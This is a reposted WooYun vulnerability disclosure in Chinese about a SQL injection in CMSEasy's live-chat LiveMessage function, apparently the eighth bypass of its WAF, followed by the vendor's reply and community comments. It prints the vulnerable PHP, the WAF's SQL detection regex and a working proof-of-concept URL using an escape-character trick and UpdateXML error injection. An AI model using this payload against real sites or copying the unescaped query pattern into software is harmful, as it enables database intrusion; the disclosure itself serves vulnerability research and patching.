cmseasy 最新版SQLl注入(第八次绕WAF)

admin
admin
admin
140559
文章
117
评论
2015年7月16日18:43:49评论333 views字数 210阅读0分42秒阅读模式
摘要

2014-10-22: 细节已通知厂商并且等待厂商处理中
2014-10-24: 厂商已经确认,细节仅向厂商公开
2014-10-27: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-12-18: 细节向核心白帽子及相关领域专家公开
2014-12-28: 细节向普通白帽子公开
2015-01-07: 细节向实习白帽子公开
2015-01-20: 细节向公众公开

漏洞概要 关注数(46) 关注此漏洞

缺陷编号: WooYun-2014-80260

漏洞标题: cmseasy 最新版SQLl注入(第八次绕WAF) cmseasy 最新版SQLl注入(第八次绕WAF)

相关厂商: cmseasy

漏洞作者: 路人甲

提交时间: 2014-10-22 11:44

公开时间: 2015-01-20 11:46

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

5人收藏

漏洞详情

披露状态:

2014-10-22: 细节已通知厂商并且等待厂商处理中
2014-10-24: 厂商已经确认,细节仅向厂商公开
2014-10-27: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-12-18: 细节向核心白帽子及相关领域专家公开
2014-12-28: 细节向普通白帽子公开
2015-01-07: 细节向实习白帽子公开
2015-01-20: 细节向公众公开

简要描述:

继续绕啊绕啊

详细说明:

cmseasy 终于更新了 看了下对比文件,那修复~~~无法吐槽~~~~

code 区域 
function LiveMessage($a) {
     global $db;
     $sessionid = $_SESSION['sessionid'];
     $name = addslashes(htmlspecialchars($a['name']));
     $email = addslashes(htmlspecialchars($a['email']));
     $country = htmlspecialchars($a['country']);
     $phone = htmlspecialchars($a['phone']);
     $departmentid = htmlspecialchars($a['departmentid']);
     $message = htmlspecialchars($a['message']);
     $timestamp = time();
     $ip = $_SERVER['REMOTE_ADDR'];
     $sql = "INSERT INTO `chat` (`sessionid`,`name`,`email`,`phone`,`departmentid`,`message`,`timestamp`,`ip`,`status`) VALUES('" . $sessionid . "','" . $name . "','" . $email . "','" . $phone . "','" . $departmentid . "','" . $message . "','" . $timestamp . "','" . $ip . "','2')";
     $db->query($sql);
     $sql = "DELETE FROM `sessions` WHERE `id`='" . $sessionid . "'";
     $db->query($sql);
     $text = "<?php echo $lang[shout_success]?>/n";
     $objResponse = new xajaxResponse('utf-8');
     $objResponse->addAssign('content', 'innerHTML', $text);
     $objResponse->redirect('../', 5);
     return $objResponse;
 }

$a是可以通过前端get或者post传入。

只修复了name和email,不修复下面几个变量 这是给我们留着漏洞挖么!!!!!!!

然后开始测试,擦 发现360safe被更新了,修复增加了检测单引号! 这不坑爹么,只要输入单引号全盘否定!

code 区域 
$getfilter = "//<.+javascript:window//[.{1}////x|<.*=(&#//d+?;?)+?>|<.*(data|src)=data:text///html.*>|//b(alert//(|confirm//(|expression//(|prompt//(|benchmark/s*?/(.*/)|sleep/s*?/(.*/)|load_file/s*?//()|<[a-z]+?//b[^>]*?//bon([a-z]{4,})/s*?=|^//+///v(8|9)|//b(and|or)//b//s*?([//(//)'/"//d]+?=[//(//)'/"//d]+?|[//(//)'/"a-zA-Z]+?=[//(//)'/"a-zA-Z]+?|>|<|/s+?[//w]+?//s+?//bin//b//s*?/(|//blike//b//s+?[/"'])|/////*.*//*///|<//s*script//b|//bEXEC//b|UNION.+?SELECT(//(.+//)|//s+?.+?|`.*?`)|UPDATE(//(.+//)|//s+?.+?|`.*?`.*?)SET|INSERT//s+INTO.+?VALUES|(SELECT|DELETE)(//(.+//)|//s+?.+?//s+?|`.*?`.*?)FROM(//(.+//)|//s+?.+?|`.*?`.*?)|(CREATE|ALTER|DROP|TRUNCATE)//s+(TABLE|DATABASE)|/////*.*?//*///|'";

但是还可以用转义符,接下来就是开始绕啊绕啊:

POC:

**.**.**.**:8080/cmseasy/celive/live/header.php?xajax=LiveMessage&xajaxargs[0][phone]=/&xajaxargs[0][departmentid]=,(UpdateXML(1,CONCAT(0x5b,user(),0x5d),1)),6,7,8)%23

另外官网没测试成功,好像有安全狗

cmseasy 最新版SQLl注入(第八次绕WAF)

漏洞证明:

cmseasy 最新版SQLl注入(第八次绕WAF)

修复方案:

全盘否定单引号 这也太坑了!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-10-24 11:03

厂商回复:

修正

最新状态:

2014-10-24:感谢提醒~~一时大意了~~

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-10-22 11:56 | 疯狗 cmseasy 最新版SQLl注入(第八次绕WAF) ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    1

    绕waf哪家强?

  2. 2014-10-22 11:57 | 狗狗侠 cmseasy 最新版SQLl注入(第八次绕WAF) ( 普通白帽子 | Rank:518 漏洞数:58 | 我是狗狗侠)

    0

    @疯狗 山东找蓝翔

  3. 2014-10-22 12:03 | menmen519 ( 普通白帽子 | Rank:970 漏洞数:166 | http://menmen519.blog.sohu.com/)

    0

    我知道注入点 是哪里 你可真快啊 还是赞一个!!!!

  4. 2014-10-22 12:23 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)

    0

    楼主是新东方还是蓝翔毕业的啊。太淫荡了。

  5. 2014-10-22 13:16 | mramydnei ( 普通白帽子 | Rank:400 漏洞数:87 )

    0

    绕过了八次,也是醉了。。

  6. 2014-10-22 13:17 | kenan@ ( 路人 | Rank:2 漏洞数:1 | php ,asp)

    0

    绕过了8次?这

  7. 2014-10-22 13:17 | xfkxfk cmseasy 最新版SQLl注入(第八次绕WAF) ( 核心白帽子 | Rank:2341 漏洞数:353 | 呵呵!)

    0

    擦,我才饶了4次,你赢了

  8. 2014-10-22 13:49 | phith0n cmseasy 最新版SQLl注入(第八次绕WAF) ( 普通白帽子 | Rank:834 漏洞数:127 | 一个想当文人的黑客~)

    1

    我帮你写补丁吧

  9. 2014-10-22 13:49 | char ( 路人 | Rank:13 漏洞数:3 | 中国平安,不只保险这么简单。)

    0

    第八个工程师已被开除。

  10. 2014-10-22 14:32 | sco4x0 ( 实习白帽子 | Rank:35 漏洞数:14 )

    0

    传说中的拔进拔出,哦不对,八进八出

  11. 2014-10-24 11:08 | phith0n cmseasy 最新版SQLl注入(第八次绕WAF) ( 普通白帽子 | Rank:834 漏洞数:127 | 一个想当文人的黑客~)

    0

    1,cmseasy真的生气了

  12. 2014-10-24 11:11 | pandas ( 普通白帽子 | Rank:730 漏洞数:84 | 国家特级保护动物)

    0

    1是什么情况?

  13. 2014-10-24 17:38 | mramydnei ( 普通白帽子 | Rank:400 漏洞数:87 )

    0

    @phith0n 程序员的自尊之类的东西吧,毕竟修8次都修不好暴露的不是编程功底或安全意识,而是智商。

  14. 2014-11-13 11:19 | wefgod ( 核心白帽子 | Rank:1829 漏洞数:183 | 力不从心)

    1

    居然给低

  15. 2014-11-13 11:28 | 乐乐、 ( 普通白帽子 | Rank:878 漏洞数:190 )

    1

    眼睁睁看着饶了八次 厂商也是醉了

  16. 2014-11-13 14:20 | luwikes ( 普通白帽子 | Rank:552 漏洞数:83 | 潜心学习~~~)

    1

    不忍直视

  17. 2014-12-11 20:13 | 迦南 ( 路人 | Rank:14 漏洞数:11 | 我不是玩黑,我就是认真)

    1

    @mramydnei 看透不说透。。。。

  18. 2014-12-11 20:50 | FenQing ( 路人 | Rank:8 漏洞数:3 | FenQing)

    1

    楼主该不会还想来第八第九吧

  19. 2015-01-20 15:15 | 用来怀念 ( 路人 | Rank:0 漏洞数:1 | 不是什么人都一定要去拥有,有的东西最好用...)

    1

    程序员绝壁已被开除!!!

  20. 2015-01-20 16:07 | BeenQuiver ( 普通白帽子 | Rank:103 漏洞数:27 | 专注而高效,坚持好的习惯千万不要放弃)

    1

    @mramydnei 说这话就有点过了

  21. 2015-01-20 16:15 | mramydnei ( 普通白帽子 | Rank:400 漏洞数:87 )

    1

    @BeenQuiver 嗯,可能有点伤人。但是我觉得会比较接近事实真相

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin